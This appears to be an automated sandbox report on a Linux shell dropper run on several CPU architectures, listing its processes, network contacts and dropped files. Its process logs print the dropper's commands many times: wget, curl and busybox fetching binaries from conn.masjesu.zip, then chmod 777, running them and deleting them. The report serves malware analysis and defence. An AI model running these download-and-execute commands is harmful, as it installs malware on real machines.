Malware Analysis Report

2025-04-03 19:11

Sample ID 241121-fp1nnszcpn
Target 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
SHA256 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649

Threat Level: Shows suspicious behavior

The file 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 05:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 05:03

Reported

2024-11-21 05:10

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 05:03

Reported

2024-11-21 05:10

Platform

debian9-armhf-20240729-en

Max time kernel

149s

Max time network

3s

Command Line

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 05:03

Reported

2024-11-21 05:10

Platform

debian9-mipsbe-20240418-en

Max time kernel

149s

Max time network

65s

Command Line

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM N/A
N/A /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE N/A
N/A /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ N/A
N/A /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik N/A
N/A /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq N/A
N/A /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN N/A
N/A /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc N/A
N/A /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX N/A
N/A /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 N/A
N/A /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm N/A
N/A /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f N/A
N/A /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD N/A
N/A /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y N/A
N/A /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ N/A
N/A /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 /usr/bin/curl N/A
File opened for modification /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /usr/bin/curl N/A
File opened for modification /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX /usr/bin/curl N/A
File opened for modification /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /usr/bin/curl N/A
File opened for modification /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y /usr/bin/curl N/A
File opened for modification /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /usr/bin/curl N/A
File opened for modification /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /usr/bin/curl N/A
File opened for modification /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /usr/bin/curl N/A
File opened for modification /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc /usr/bin/curl N/A
File opened for modification /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm /usr/bin/curl N/A
File opened for modification /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD /usr/bin/curl N/A
File opened for modification /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /usr/bin/curl N/A
File opened for modification /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /usr/bin/curl N/A
File opened for modification /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN /usr/bin/curl N/A
File opened for modification /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ /usr/bin/curl N/A

Processes

/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/bin/chmod

[chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM

[./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/bin/rm

[rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/bin/chmod

[chmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE

[./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/bin/rm

[rm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/bin/chmod

[chmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ

[./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/bin/rm

[rm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/bin/chmod

[chmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik

[./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/bin/rm

[rm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/bin/chmod

[chmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq

[./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/bin/rm

[rm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/bin/chmod

[chmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN

[./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/bin/rm

[rm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/bin/chmod

[chmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc

[./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/bin/rm

[rm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/bin/chmod

[chmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX

[./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/bin/rm

[rm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/bin/chmod

[chmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5

[./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/bin/rm

[rm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/bin/chmod

[chmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm

[./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/bin/rm

[rm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/chmod

[chmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f

[./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/rm

[rm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/bin/chmod

[chmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD

[./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/bin/rm

[rm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

/bin/chmod

[chmod 777 asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

/tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y

[./asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

/bin/rm

[rm asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]

/bin/chmod

[chmod 777 Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]

/tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ

[./Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]

/bin/rm

[rm Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/chmod

[chmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f

[./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/bin/rm

[rm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 05:03

Reported

2024-11-21 05:11

Platform

debian9-mipsel-20240611-en

Max time kernel

150s

Max time network

56s

Command Line

[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM N/A
